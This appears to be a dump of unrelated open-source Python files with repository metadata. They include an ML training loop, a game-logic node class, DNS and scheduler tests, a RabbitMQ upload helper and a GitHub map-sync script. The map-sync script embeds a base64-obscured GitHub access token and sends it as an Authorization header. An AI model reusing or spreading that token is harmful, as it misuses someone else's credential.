loss = model.step(optimizer, loss_cls)
acc_cls = acc_cls.mean()
t_writer.add_scalar('loss', loss, num_iters)
t_writer.add_scalar('acc', acc_cls, num_iters)
end = num_iters >= args.iterations
if end:
break
num_iters += 1
pbar.update(1)
if (num_iters + 1) % 2000 == 0:
logging.info("Test dataset")
_ = val_step(test_loader)
logging.info("Valid dataset")
val_acc = val_step(val_loader)
if val_acc > best_acc:
best_acc = val_acc
save_orderdict = model.state_dict()
torch.save(save_orderdict, os.path.join(save_folder, 'oracle_cls_best.pt'))
else:
et += 1
if et >= 5:
logging.info("Early Stopping..")
break
if not end:
e += 1
logging.info("Training loop. The ith epoch completed: %d" % e)
save_orderdict = model.state_dict()
torch.save(save_orderdict, os.path.join(save_folder, 'oracle_cls_latest.pt'))
logging.info("Test dataset")
val_step(test_loader)
logging.info("Valid dataset")
val_step(val_loader)
logging.info("-" * 50)
logging.info("best acc: {:.4f}".format(best_acc))
if __name__ == '__main__':
args = parser.parse_args()
train(args)
|
ImKeTT/AdaVAE
|
controlgen/oracle_cls.py
|
oracle_cls.py
|
py
| 9,368 |
python
|
en
|
code
| 32 |
github-code
|
6
|
10418352733
|
from __future__ import annotations
import dataclasses
import typing
from randovania.game_description.db.resource_node import ResourceNode
from randovania.game_description.requirements.requirement_and import RequirementAnd
from randovania.game_description.requirements.resource_requirement import ResourceRequirement
from randovania.game_description.resources.node_resource_info import NodeResourceInfo
if typing.TYPE_CHECKING:
from randovania.game_description.db.node import Node, NodeContext
from randovania.game_description.requirements.base import Requirement
from randovania.game_description.resources.resource_info import ResourceGain
def _all_nodes_in_network(context: NodeContext, network_name: str) -> typing.Iterator[TeleporterNetworkNode]:
for node in context.node_provider.iterate_nodes():
if isinstance(node, TeleporterNetworkNode) and node.network == network_name:
yield node
@dataclasses.dataclass(frozen=True, slots=True)
class TeleporterNetworkNode(ResourceNode):
"""
    Represents a node that belongs to a set of nodes between which you can move freely if some conditions are satisfied.
- can only teleport *to* if `is_unlocked` is satisfied
- can only teleport *from* if the node has been activated
A TeleporterNetworkNode being activated is implemented as being collected, with this class being a ResourceNode.
There are three methods of activating a TeleporterNetworkNode:
Method 1:
- Be the starting node
Method 2:
- Collecting a TeleporterNetworkNode also collects all other nodes in the same network with satisfied `is_unlocked`
Method 3:
- Collect the node normally by reaching it, with `is_unlocked` satisfied and one of:
- `requirement_to_activate` is satisfied
- this node was already collected
"""
is_unlocked: Requirement
network: str
requirement_to_activate: Requirement
def requirement_to_leave(self, context: NodeContext) -> Requirement:
return RequirementAnd([self.is_unlocked, ResourceRequirement.simple(self.resource(context))])
def resource(self, context: NodeContext) -> NodeResourceInfo:
return NodeResourceInfo.from_node(self, context)
def can_collect(self, context: NodeContext) -> bool:
resources = context.current_resources
req = self.requirement_to_activate
if resources.has_resource(self.resource(context)) or req.satisfied(resources, 0, context.database):
return not self.is_collected(context)
else:
return False
def is_collected(self, context: NodeContext) -> bool:
current_resources = context.current_resources
return all(
context.has_resource(node.resource(context))
for node in _all_nodes_in_network(context, self.network)
if node.is_unlocked.satisfied(current_resources, 0, context.database)
)
def resource_gain_on_collect(self, context: NodeContext) -> ResourceGain:
for node in _all_nodes_in_network(context, self.network):
if node.is_unlocked.satisfied(context.current_resources, 0, context.database):
yield node.resource(context), 1
def connections_from(self, context: NodeContext) -> typing.Iterator[tuple[Node, Requirement]]:
for node in _all_nodes_in_network(context, self.network):
if node != self:
yield node, node.is_unlocked
|
randovania/randovania
|
randovania/game_description/db/teleporter_network_node.py
|
teleporter_network_node.py
|
py
| 3,434 |
python
|
en
|
code
| 165 |
github-code
|
6
|
39269318225
|
import logging
import os
import random
import sys
from functools import wraps
from pprint import pformat
from subprocess import Popen, PIPE
from threading import Thread
from dim import db
from dim.models.dns import OutputUpdate
from dim.rpc import TRPC
from tests.pdns_test import PDNSTest
from tests.pdns_util import compare_dim_pdns_zones, this_dir, test_pdns_output_process
def delete_record(rpc, r):
rpc.rr_delete(zone=r['zone'], name=r['record'], type=r['type'], **r['value'])
def add_record(rpc, r):
rpc.rr_create(zone=r['zone'], name=r['record'], type=r['type'], ttl=r['ttl'], **r['value'])
def extract(l, selected_idx):
'''split l into two lists: elements with indices in selected and the rest'''
selected = []
rejected = []
selected_idx = set(selected_idx)
for i, e in enumerate(l):
if i in selected_idx:
selected.append(e)
else:
rejected.append(e)
return selected, rejected
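# Hedged illustration (helper added for this write-up, not part of the original test):
# extract() partitions a list into (selected, rejected) by index membership.
def _example_extract():
    picked, rest = extract(['a', 'b', 'c', 'd'], [0, 2])
    assert picked == ['a', 'c'] and rest == ['b', 'd']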
class TestRequestProxy(object):
    '''
    Simulate the flask lifecycle of a request by creating a new TRPC instance and request context
    (which in turn creates a new db session)
'''
def __init__(self, username, app):
self.app = app
self.username = username
def __getattr__(self, name):
if not name.startswith('_'):
obj = TRPC(username=self.username)
func = getattr(obj, name)
if callable(func):
@wraps(func)
def wrapper(*args, **kwargs):
with self.app.test_request_context():
return func(*args, **kwargs)
return wrapper
raise AttributeError
done = False
def run_test(app, zone, pdns_output, db_uri, pdns_ip):
global done
try:
rpc = TestRequestProxy('test_user', app)
def check_zone():
global done
pdns_output.wait_updates(zone)
if not compare_dim_pdns_zones(rpc, pdns_ip, {zone: None}):
done = True
if done:
sys.exit()
check_zone()
rpc.zone_dnssec_enable(zone, nsec3_algorithm=1, nsec3_iterations=1, nsec3_salt='deadcafe')
check_zone()
records = rpc.rr_list(zone=zone, value_as_object=True)
created = [r for r in records if r['type'] not in ('SOA', 'DNSKEY')]
deleted = []
total = len(created)
for _ in range(30):
selected = random.sample(range(total), random.randint(1, 5))
midpoint = len(created)
to_del, created = extract(created, [i for i in selected if i < midpoint])
to_add, deleted = extract(deleted, [i - midpoint for i in selected if i >= midpoint])
created.extend(to_add)
deleted.extend(to_del)
print('Adding', pformat(to_add))
print('Deleting', pformat(to_del))
for r in to_del:
delete_record(rpc, r)
for r in to_add:
add_record(rpc, r)
check_zone()
rpc.zone_dnssec_disable(zone)
check_zone()
except:
logging.exception('Exception in run_test')
done = True
def import_zone(zone):
    # text mode so communicate() can be fed the zone file contents as str
    proc = Popen(['ndcli', 'import', 'zone', zone], stdin=PIPE, stdout=PIPE, universal_newlines=True)
zone_contents = open(this_dir(zone)).read()
stdout, stderr = proc.communicate(zone_contents)
if proc.returncode != 0:
raise Exception('zone import failed')
class PDNSOutputProcess(object):
def __enter__(self):
self.proc = test_pdns_output_process(True)
return self
def __exit__(self, *args):
self.proc.kill()
self.proc = None
def wait_updates(self, zone):
'''Wait for all updates to be processed'''
with test.app.test_request_context():
while True:
db.session.rollback()
if OutputUpdate.query.filter(OutputUpdate.zone_name == zone).count() == 0:
break
else:
os.read(self.proc.stdout.fileno(), 1024)
if __name__ == '__main__':
zones = {'web.de': {'db_uri': 'mysql://pdns:[email protected]:3307/pdns1',
'pdns_ip': '127.1.1.1'},
'web2.de': {'db_uri': 'mysql://pdns:[email protected]:3307/pdns2',
'pdns_ip': '127.2.2.2'}}
global test
test = PDNSTest('__init__')
test.setUp()
for zone in list(zones.keys()):
test.cleanup_pdns_db(zones[zone]['db_uri'])
import_zone(zone)
test.create_output_for_zone(zone, zone, zone, db_uri=zones[zone]['db_uri'])
with PDNSOutputProcess() as pdns_output:
threads = []
for zone, attr in zones.items():
t = Thread(target=run_test, args=(test.app, zone, pdns_output), kwargs=attr)
t.start()
threads.append(t)
for t in threads:
        while t.is_alive():
t.join(0.1)
|
1and1/dim
|
dim-testsuite/tests/pdns_changes.py
|
pdns_changes.py
|
py
| 4,950 |
python
|
en
|
code
| 39 |
github-code
|
6
|
8169757480
|
"""
Exercise 4
Name vertically in staircase form. Modify the previous program so that it shows the name in a staircase format.
F
FU
FUL
FULA
FULAN
FULANO
"""
nome = input('Enter your name: ').strip().upper()
# OPTION 1
n = ''
for c in nome:
n += c
print(n)
# OPTION 2
# for c in range(len(nome)+1):
# print(nome[:c])
|
fabriciovale20/ListaExerciciosPythonBrasil
|
6. String/ex004.py
|
ex004.py
|
py
| 341 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
39261296650
|
import os
import shutil
import zipfile
from base64 import b64decode
from utils.config import config
import requests
root_path = os.getcwd()
gat = (
"Z2l0aHViX3BhdF8xMUJBQkhHNkEwa1JRZEM1dFByczhVXzU0cERCS21URXRGYm"
"FYRElUWE5KVUk4VkUxVTdjb0dHbElMSWdhVnI2Qkc3QzVCN0lCWlhWdDJMOUo2"
)
def download_and_extract_zip(url, root_path):
zip_file_path = os.path.join(root_path, "repository.zip")
response = requests.get(url, stream=True)
response.raise_for_status()
total_size = int(response.headers.get("Content-Length", 0))
if total_size == 0:
print("下载失败!")
return 0
block_size = 1024 # 每次下载的块大小
progress = 0
with open(zip_file_path, "wb") as file:
for data in response.iter_content(block_size):
progress += len(data)
file.write(data)
            # compute the download progress and display a progress bar
            percent = (progress / total_size) * 100
            progress_bar = "=" * int(percent // 5) + ">"
            print(f"Download progress: {percent:.2f}% [{progress_bar:<20}] ", end="\r")
    print("\nDownload complete!")
    # extract the ZIP file
    with zipfile.ZipFile(zip_file_path, "r") as zip_ref:
        zip_ref.extractall(root_path)
    os.remove(zip_file_path)  # delete the ZIP file
return 1
def sync_github_repo(repo_url, root_path):
    # build the API URL
    api_url = f"https://api.github.com/repos/{repo_url}/zipball/main"
    # create the save path if it does not exist
    os.makedirs(root_path, exist_ok=True)
    # download and extract the ZIP file
return download_and_extract_zip(api_url, root_path)
def get_latest_branch_sha(repo_url):
url = f"https://api.github.com/repos/{repo_url}/branches"
headers = {
"Accept": "application/vnd.github.v3+json",
"Authorization": b64decode(gat).decode("utf-8"),
}
try:
response = requests.get(url, headers=headers, timeout=3)
except:
return None
if response.status_code == 200:
branches = response.json()
if branches:
latest_branch = branches[0]
return latest_branch["commit"]["sha"]
else:
return None
def copy_folder_contents(source_folder, destination_folder):
    # create the destination folder if it does not exist
    if not os.path.exists(destination_folder):
        os.makedirs(destination_folder)
    # iterate over all files and subfolders in the source folder
    for item in os.listdir(source_folder):
        source = os.path.join(source_folder, item)
        destination = os.path.join(destination_folder, item)
        if os.path.isfile(source):
            # if the source item is a file, copy it directly, overwriting any same-named file
            shutil.copy2(source, destination)
        elif os.path.isdir(source):
            # if the source item is a folder, copy it by recursing into it
copy_folder_contents(source, destination)
def update_map(force=False):
repo_url = "CHNZYX/maps"
    # get the remote sha
    remote_sha = get_latest_branch_sha(repo_url)
    if remote_sha is None:
        print("Failed to get the remote map sha, please check the network connection")
        return "Failed to get the remote map sha, please check the network connection", "red"
    print("Remote map sha: " + remote_sha)
    # get the local sha
    local_sha = config.map_sha
    print("Local map sha: " + local_sha)
    # check whether an update is needed
    if remote_sha == local_sha:
        print("Map does not need updating")
        return "The map is already the latest version", "green"
map_path = os.path.join(root_path, "imgs\\maps")
print("Map path: " + map_path)
    # download the map repository and extract it
    status = sync_github_repo(repo_url, root_path)
    if status == 0:
        return "Download failed", "red"
    print("Download complete")
    # find the downloaded map folder
t = os.listdir(root_path)
chn_folders = [item for item in t if item.startswith("CHNZYX")]
downloaded_map_path = os.path.join(os.path.join(root_path, chn_folders[0]), "maps")
print("download_map_path: " + downloaded_map_path)
print("解压中...")
# 删除原有map文件夹,复制新的map文件夹
if force:
shutil.rmtree(map_path)
shutil.copytree(downloaded_map_path, map_path)
else:
copy_folder_contents(downloaded_map_path, map_path)
shutil.rmtree(os.path.dirname(downloaded_map_path))
    # update the stored sha
config.map_sha = remote_sha
config.save()
print("更新完成")
return "更新完成", "green"
|
CHNZYX/Auto_Simulated_Universe
|
utils/update_map.py
|
update_map.py
|
py
| 4,483 |
python
|
en
|
code
| 2,771 |
github-code
|
6
|
5308998970
|
# ababcdcdababcdcd ->2ab2cd2ab2cd ->2 ababcdcd
# abcabcdede -> abcabc2de ->2abcdede
# group in chunks whose size increases by 1 -> merge identical adjacent chunks -> get the length
# one test case errored out -> handling lengths 1, 2, 3 as special cases fixes it
def solution(s):
def merge_len(var):
cnt = 1
temp = ''
        # the last chunk needs special-case handling
for i in range(len(var)-1):
if var[i] == var[i+1]:
cnt += 1
if (i+1) == len(var)-1:
temp += str(cnt) + var[i]
else:
if cnt > 1:
temp += str(cnt) + var[i]
else:
temp += var[i]
cnt = 1
if (i+1) == len(var)-1:
temp += var[i+1]
return len(temp)
if len(s) == 1:
return 1
elif len(s) == 2:
return 2
elif len(s) == 3:
return 3
minimum = merge_len(s)
for i in range(2, len(s)//2+1):
temp = []
for j in range(0, len(s), i):
            # in this case slicing already truncates correctly, so the special case below is unnecessary
# if j+i-1 > len(s)-1:
# temp.append(s[j:])
# break
temp.append(s[j:j+i])
minimum = min(minimum, merge_len(temp))
return minimum
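# Hedged sanity check (added for illustration; example taken from the problem statement):
# "aabbaccc" compresses best with chunk size 1 into "2a2ba3c", i.e. length 7.
if __name__ == "__main__":
    assert solution("aabbaccc") == 7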
# def compress(text, tok_len):
# words = [text[i:i+tok_len] for i in range(0, len(text), tok_len)]
# res = []
# cur_word = words[0]
# cur_cnt = 1
# for a, b in zip(words, words[1:] + ['']):
# if a == b:
# cur_cnt += 1
# else:
# res.append([cur_word, cur_cnt])
# cur_word = b
# cur_cnt = 1
# return sum(len(word) + (len(str(cnt)) if cnt > 1 else 0) for word, cnt in res)
# def solution(text):
# [len(text)] -> must be included because text lengths 1, 2, 3 are edge cases.
# return min(compress(text, tok_len) for tok_len in list(range(1, int(len(text)/2) + 1)) + [len(text)])
|
louisuss/Algorithms-Code-Upload
|
Python/Programmers/Level2/문자열압축.py
|
문자열압축.py
|
py
| 2,022 |
python
|
ko
|
code
| 0 |
github-code
|
6
|
15503714340
|
import numpy as np
a = np.array([1, 2, 3, 4])
b = np.array([5, 6, 7, 8])
c = np.add(a, b)
print(c)
# creating a custom ufunc - universal functions
def add_2_str(v, k):
y = v + k
return y
add_2_str = np.frompyfunc(add_2_str, nin=2, nout=1)
print(add_2_str([1, 2, 3, 4, 5], [6, 7, 8, 9, 10]))
print(add_2_str("Hie", "Hello"))
# shows the returned object is a numpy ufunc (<class 'numpy.ufunc'>)
print(type(add_2_str))
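# Hedged addition (illustration only): np.frompyfunc returns object-dtype arrays, so numeric
# results usually need an explicit cast back to a numeric dtype.
obj_result = add_2_str([1, 2, 3], [4, 5, 6])
print(obj_result.dtype, obj_result.astype(np.int64))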
|
BLACKANGEL-1807/Python-Scripts
|
Numpy(basics)/numpy_ufunc.py
|
numpy_ufunc.py
|
py
| 406 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27070905288
|
import datetime as dt
import random
import pytest
from scheduler import Scheduler, SchedulerError
from scheduler.base.definition import JobType
from scheduler.threading.job import Job
from ...helpers import DELETE_NOT_SCHEDULED_ERROR, foo
@pytest.mark.parametrize(
"n_jobs",
[
1,
2,
3,
10,
],
)
def test_delete_job(n_jobs):
sch = Scheduler()
assert len(sch.jobs) == 0
jobs = []
for _ in range(n_jobs):
jobs.append(sch.once(dt.datetime.now(), foo))
assert len(sch.jobs) == n_jobs
job = random.choice(jobs)
sch.delete_job(job)
assert job not in sch.jobs
assert len(sch.jobs) == n_jobs - 1
# test error if the job is not scheduled
with pytest.raises(SchedulerError, match=DELETE_NOT_SCHEDULED_ERROR):
sch.delete_job(job)
@pytest.mark.parametrize(
"empty_set",
[
False,
True,
],
)
@pytest.mark.parametrize(
"any_tag",
[
None,
False,
True,
],
)
@pytest.mark.parametrize(
"n_jobs",
[
0,
1,
2,
3,
10,
],
)
def test_delete_jobs(n_jobs, any_tag, empty_set):
sch = Scheduler()
assert len(sch.jobs) == 0
for _ in range(n_jobs):
sch.once(dt.datetime.now(), foo)
assert len(sch.jobs) == n_jobs
if empty_set:
if any_tag is None:
num_del = sch.delete_jobs()
else:
num_del = sch.delete_jobs(any_tag=any_tag)
else:
if any_tag is None:
num_del = sch.delete_jobs(tags={})
else:
num_del = sch.delete_jobs(tags={}, any_tag=any_tag)
assert len(sch.jobs) == 0
assert num_del == n_jobs
@pytest.mark.parametrize(
"job_tags, delete_tags, any_tag, n_deleted",
[
[[{"a", "b"}, {"1", "2", "3"}, {"a", "1"}], {"a", "1"}, True, 3],
[[{"a", "b"}, {"1", "2", "3"}, {"a", "2"}], {"b", "1"}, True, 2],
[[{"a", "b"}, {"1", "2", "3"}, {"b", "1"}], {"3"}, True, 1],
[[{"a", "b"}, {"1", "2", "3"}, {"b", "2"}], {"2", "3"}, True, 2],
[[{"a", "b"}, {"1", "2", "3"}, {"a", "1"}], {"a", "1"}, False, 1],
[[{"a", "b"}, {"1", "2", "3"}, {"a", "2"}], {"b", "1"}, False, 0],
[[{"a", "b"}, {"1", "2", "3"}, {"b", "1"}], {"1", "3"}, False, 1],
[[{"a", "b"}, {"1", "2", "3"}, {"b", "2"}], {"2", "3"}, False, 1],
],
)
def test_delete_tagged_jobs(job_tags, delete_tags, any_tag, n_deleted):
sch = Scheduler()
for tags in job_tags:
sch.once(dt.timedelta(), lambda: None, tags=tags)
assert sch.delete_jobs(tags=delete_tags, any_tag=any_tag) == n_deleted
|
DigonIO/scheduler
|
tests/threading/scheduler/test_sch_delete_jobs.py
|
test_sch_delete_jobs.py
|
py
| 2,653 |
python
|
en
|
code
| 51 |
github-code
|
6
|
6814879797
|
import pika, json
def upload(f, fs, channel, access):
# put file into mongodb database
try:
# get file if success
fid = fs.put(f)
except Exception as err:
return "internal server error", 500
# create message
message = {
"video_fid": str(fid),
"mp3_fid": None,
# who owns the file
"username": access["username"],
}
# put message in queue
try:
channel.basic_publish(
exchange="",
routing_key="video",
# convert python object to json string
body=json.dumps(message),
properties=pika.BasicProperties(
# make messages persistent
delivery_mode=pika.PERSISTENT_DELIVERY_MODE
),
)
    # if the message was unsuccessfully added to the queue
except:
# delete file, because it's not connected to any message
fs.delete(fid)
return "internal server error", 500
|
dawmro/testing_microservice_architectures
|
python/src/gateway/storage/util.py
|
util.py
|
py
| 807 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29800711842
|
import mraa
import time
RedPin = 3
BluePin = 4
# humidity_seneor = mraa.Gpio(sensorPin)
# humidity_seneor.dir(mraa.DIR_IN)
i = 0
redLED = mraa.Gpio(RedPin)
blueLED = mraa.Gpio(BluePin)
redLED.dir(mraa.DIR_OUT)
blueLED.dir(mraa.DIR_OUT)
try:
while (1):
redLED.write(True)
blueLED.write(False)
time.sleep(1)
redLED.write(False)
blueLED.write(True)
time.sleep(1)
except KeyboardInterrupt:
redLED.write(False)
blueLED.write(False)
    exit()
|
RichardZSJ/IoT-Project
|
test sensor.py
|
test sensor.py
|
py
| 481 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8097011811
|
import pathlib
import PIL.Image
import PIL.ImageChops
import pyscreenshot
from sigsolve import imageutil, geometry
import numpy
def rehydrate(array):
# return PIL.Image.frombytes('RGB', array.shape[:2], array.astype(numpy.uint8).tobytes())
return PIL.Image.fromarray(array, 'RGB')
class Vision:
# How many light levels can a tile differ (in either direction) from the baseline before the tile is no longer
    # considered empty. This relies on integer rollover to avoid needing an int16 over a uint8.
MAX_EMPTY_TOLERANCE = 2
@staticmethod
def _getimage(what):
if isinstance(what, (str, bytes, pathlib.Path)):
what = PIL.Image.open(what)
if what.mode != 'RGB':
what = what.convert('RGB')
return what
def __init__(self, baseline=None, composites=None, extents=None):
"""
Handles image processing state functionality.
:param baseline: Baseline image. If this is a string or Path object, it is assumed to be a filename and is
loaded.
:param composites: Optional dictionary of composite images (or image filenames), with IDs as keys.
:param extents: Rectangle of the area we're interested in. Default is the whole image.
"""
self.baseline = self._getimage(baseline)
if extents:
self.baseline = self.baseline.crop(extents.coords)
else:
extents = geometry.Rect(geometry.Point.ORIGIN, self.baseline.size)
self.baseline = imageutil.numpify(self.baseline)
self.baseline.flags.writeable = True
# Some processing.
self.baseline += self.MAX_EMPTY_TOLERANCE
self.baseline[self.baseline < self.MAX_EMPTY_TOLERANCE] = 255 # Cap off what just rolled over
self.extents = extents
self.offset = -self.extents.xy1
self.composites = {}
if composites is not None:
for key, image in composites.items():
self.add_composite(key, image)
self.image = None
def add_composite(self, key, image):
self.composites[key] = imageutil.numpify(self._getimage(image)).astype(numpy.int16)
def match(self, tile):
"""Finds the composite that most closely matches the source tile's image."""
coords = (tile.sample_rect + self.offset).coords
base = self.baseline[coords[1]:coords[3], coords[0]:coords[2], 0:3]
cropped = self.image.crop(coords)
if numpy.all(base - imageutil.numpify(cropped) < 2*self.MAX_EMPTY_TOLERANCE):
return None
data = imageutil.numpify(imageutil.equalize(cropped)).astype(numpy.int16)
buf = numpy.ndarray(data.shape, data.dtype)
unsigned = buf.view(numpy.uint16)
best = None
bestscore = None
for key, composite in self.composites.items():
numpy.subtract(data, composite, out=buf) # Initialize buf with a difference between the two arrays
# We casually convert between signed and unsigned here, and the math just happens to work out due to
# sign extension and truncation.
unsigned **= 2 # Raise all values to power of 2.
score = numpy.sum(unsigned)
if bestscore is None or score < bestscore:
bestscore = score
best = key
return best
def screenshot(self):
"""Sets the image to a screenshot"""
self.set_image(
pyscreenshot.grab(self.extents.coords), cropped=True
)
def set_image(self, image, cropped=False):
"""Sets the image"""
image = self._getimage(image)
if not cropped and (self.extents.xy1 != geometry.Point.ORIGIN or self.extents.xy2 != image.size):
image = image.crop(self.extents.coords)
self.image = image
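# Hedged illustration (not part of the original module) of the signed/unsigned squaring trick
# used in Vision.match(): squaring an int16 difference through a uint16 view yields the correct
# squared distance as long as each square fits in 16 bits (|diff| <= 255 for equalized pixels).
def _demo_uint16_square_trick():
    diff = numpy.array([-3, 7, -255], dtype=numpy.int16)
    view = diff.view(numpy.uint16)
    view **= 2  # in-place square, computed modulo 2**16
    assert view.tolist() == [9, 49, 65025]
    return view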
|
dewiniaid/sigsolve
|
sigsolve/vision.py
|
vision.py
|
py
| 3,821 |
python
|
en
|
code
| 3 |
github-code
|
6
|
31951175852
|
# TESTING EXERCISES
from random import choice
import string
class Boggle:
def __init__(self):
self.words = self.read_dict("words.txt")
def read_dict(self, dict_path):
with open(dict_path) as dict_file:
return [word.strip() for word in dict_file]
def make_board(self):
board = []
for y in range(5):
row = [choice(string.ascii_uppercase) for _ in range(5)]
board.append(row)
return board
def check_valid_word(self, board, word):
word_exists = word in self.words
valid_word = self.find(board, word.upper())
if word_exists and valid_word:
result = "ok"
elif word_exists and not valid_word:
result = "not-on-board"
else:
result = "not-word"
return result
def find_from(self, board, word, y, x, seen):
        # off-board check; negative indices would otherwise wrap around the board
        if x < 0 or x > 4 or y < 0 or y > 4:
            return False
if board[y][x] != word[0]:
return False
if (y, x) in seen:
return False
if len(word) == 1:
return True
seen = seen | {(y, x)}
neighbors = [(y-1, x), (y+1, x), (y, x-1), (y, x+1),
(y-1, x-1), (y+1, x+1), (y-1, x+1), (y+1, x-1)]
for ny, nx in neighbors:
if self.find_from(board, word[1:], ny, nx, seen):
return True
seen.remove((y, x))
return False
def find(self, board, word):
for y in range(0, 5):
for x in range(0, 5):
if self.find_from(board, word, y, x, seen=set()):
return True
return False
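# Hedged usage sketch (helper added for illustration; requires the words.txt dictionary file):
def _example_boggle_round():
    game = Boggle()
    board = game.make_board()  # 5x5 grid of random uppercase letters
    # returns "ok", "not-on-board" or "not-word" depending on the random board
    return game.check_valid_word(board, "cat")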
|
ortolanotyler/flaskproblemsets
|
24.5/boggle.py
|
boggle.py
|
py
| 1,651 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21355088375
|
class Solution:
def networkDelayTime(self, times, n: int, k: int) -> int:
graph = dict()
for i in range(1, n+1):
graph[i] = dict()
for edge in times:
graph[edge[0]][edge[1]] = edge[2]
all_node = {i for i in range(1, n+1)}
t_node = {k}
dist = [float('inf')]*(n+1)
dist[k] = 0
while True:
min_path = float('inf')
min_idx = -1
            # renamed loop variable so it does not shadow the node-count parameter n
            for node in t_node:
                for ntr in graph[node].keys():
                    # print(ntr)
                    if ntr not in t_node and dist[node]+graph[node][ntr] < min_path:
                        min_path = dist[node]+graph[node][ntr]
                        min_idx = ntr
if min_path == float('inf'):
return -1
else:
t_node |= {min_idx}
dist[min_idx] = min_path
if t_node == all_node:
break
# print(dist, t_node, all_node)
return max(dist[1:])
s = Solution()
print(s.networkDelayTime(
# [[2,1,1],[2,3,1],[3,4,1]],
# 4, 2
[[1,2,1]],
2,2
))
|
Alex-Beng/ojs
|
FuckLeetcode/743. 网络延迟时间.py
|
743. 网络延迟时间.py
|
py
| 1,153 |
python
|
en
|
code
| 0 |
github-code
|
6
|
12026854258
|
import sys
from PyQt4 import QtGui, QtCore
import pyfits
import os
from gui import Ui_mainwindow as MW
from analysis import *
class ModeloTablaEjes(QtCore.QAbstractListModel):
def __init__(self, ejes = [], parent = None):
QtCore.QAbstractListModel.__init__(self,parent)
self._ejes = ejes
def rowCount(self, parent):
return len(self._ejes)
def data(self, index, role):
if role == QtCore.Qt.DisplayRole:
row = index.row()
value = self._ejes[row]
return value
class MainWindow(QtGui.QMainWindow):
CurrentPath = ""
CurrentFile = ""
Simple = False
NAxis = 0
BitPix = 0
Axis = []
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.ui = MW()
self.ui.setupUi(self)
self.ui.actionOpen.triggered.connect(self.test)
def test(self):
filename = str(QtGui.QFileDialog.getOpenFileName(self, "Open Fits"))
self.CurrentPath = filename
self.CurrentFile = os.path.basename(filename)
print(filename)
self.lectura()
def lectura(self):
hdu = pyfits.open(str(self.CurrentPath))
header = hdu[0].header
self.Simple = str(header["SIMPLE"])
self.BitPix = str(header["BITPIX"])
self.NAxis = str(header["NAXIS"])
for i in range(1, (int(self.NAxis)+1)):
eje = "NAXIS" + str(i)
self.Axis.append(header[eje])
hdu.close()
#self.Cluster()
self.Mostrar()
def Mostrar(self):
"""
        Displays the Fits data in the main window.
        :return: None
"""
self.ui.textBrowser.setText(self.CurrentFile)
self.ui.textBrowser_2.setText(self.Simple)
self.ui.textBrowser_3.setText(self.BitPix)
self.ui.textBrowser_4.setText(self.NAxis)
model = ModeloTablaEjes(self.Axis)
self.ui.tableView.setModel(model)
scene = QtGui.QGraphicsScene()
scene.setSceneRect(-600,-600, 600,600)
pic = QtGui.QPixmap("1-Orig.png")
scene.addItem(QtGui.QGraphicsPixmapItem(pic))
self.ui.graphicsView.setScene(scene)
self.ui.graphicsView.setRenderHint(QtGui.QPainter.Antialiasing)
self.ui.graphicsView.show()
def Cluster(self):
ana = analicis()
ana.Clusterisar(self.CurrentPath, self.CurrentFile)
if __name__ == "__main__":
dirs()
app = QtGui.QApplication(sys.argv)
myapp = MainWindow()
myapp.show()
sys.exit(app.exec_())
|
ChivoAttic/StructureDetection
|
Gui/app.py
|
app.py
|
py
| 2,574 |
python
|
en
|
code
| 2 |
github-code
|
6
|
14594653005
|
import tensorflow as tf
import pathlib
import os
import cv2
import numpy as np
import tqdm
import argparse
class TFRecordsSeg:
def __init__(self,
image_dir="/datasets/custom/cityscapes",
label_dir="/datasets/custom/cityscapes",
tfrecord_path="data.tfrecords",
classes=34,
img_pattern="*.png",
label_pattern="*.png"):
"""
        :param image_dir: directory containing the input images
        :param label_dir: directory containing the segmentation label images
        :param tfrecord_path: output path for the generated tfrecords file
        :param classes: number of segmentation classes
        :param img_pattern: glob pattern used to find image files
        :param label_pattern: glob pattern used to find label files
"""
# self.data_dir = data_dir
# self.labels_dir = os.path.join(data_dir, "gtFine/{}".format(split))
# self.image_dir = os.path.join(data_dir, "leftImg8bit/{}".format(split))
self.image_dir = image_dir
self.labels_dir = label_dir
self.tfrecord_path = tfrecord_path
self.labels = []
self.classes = classes
self.img_pattern = img_pattern
self.label_pattern = label_pattern
self.image_feature_description = \
{
'label': tf.io.FixedLenFeature([], tf.string),
'image': tf.io.FixedLenFeature([], tf.string)
}
@staticmethod
def _bytes_feature(value):
"""Returns a bytes_list from a string / byte."""
if isinstance(value, type(tf.constant(0))):
value = value.numpy() # BytesList won't unpack a string from an EagerTensor.
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
@staticmethod
def _float_feature(value):
"""Returns a float_list from a float / double."""
return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))
@staticmethod
def _int64_feature(value):
"""Returns an int64_list from a bool / enum / int / uint."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _parse_example_function(self, example_proto):
# Parse the input tf.Example proto using the dictionary above.
return tf.io.parse_example(example_proto, self.image_feature_description)
def image_example(self, image_string, label):
feature = {
'label': self._bytes_feature(label),
'image': self._bytes_feature(image_string)
}
return tf.train.Example(features=tf.train.Features(feature=feature))
def return_inst_cnts(self, inst_ex):
inst_cnt = np.zeros(inst_ex.shape)
for unique_class in np.unique(inst_ex):
inst_img = (inst_ex == unique_class) / 1
cnts, _ = cv2.findContours(inst_img.astype("uint8"), cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
inst_cnt = cv2.drawContours(inst_cnt, cnts, -1, (1., 1., 1.), thickness=1)
return inst_cnt
def write_tfrecords(self, training=False, dataset_name=""):
img_paths = sorted(pathlib.Path(self.image_dir).rglob(self.img_pattern))
label_paths = sorted(pathlib.Path(self.labels_dir).rglob(self.label_pattern))
with tf.io.TFRecordWriter(self.tfrecord_path) as writer:
for img_path, label_path in tqdm.tqdm(zip(img_paths, label_paths)):
img_string = open(str(img_path), 'rb').read()
label_string = open(str(label_path), 'rb').read()
tf_example = self.image_example(img_string, label_string)
writer.write(tf_example.SerializeToString())
if training:
import json
if os.path.exists('{}/data_samples.json'.format(os.path.dirname(self.tfrecord_path))):
with open('{}/data_samples.json'.format(os.path.dirname(self.tfrecord_path))) as f:
data = json.load(f)
if dataset_name in list(data.keys()):
print("Dataset {} value was already present but value was updated".format(dataset_name))
else:
data = {}
data[dataset_name] = len(img_paths)
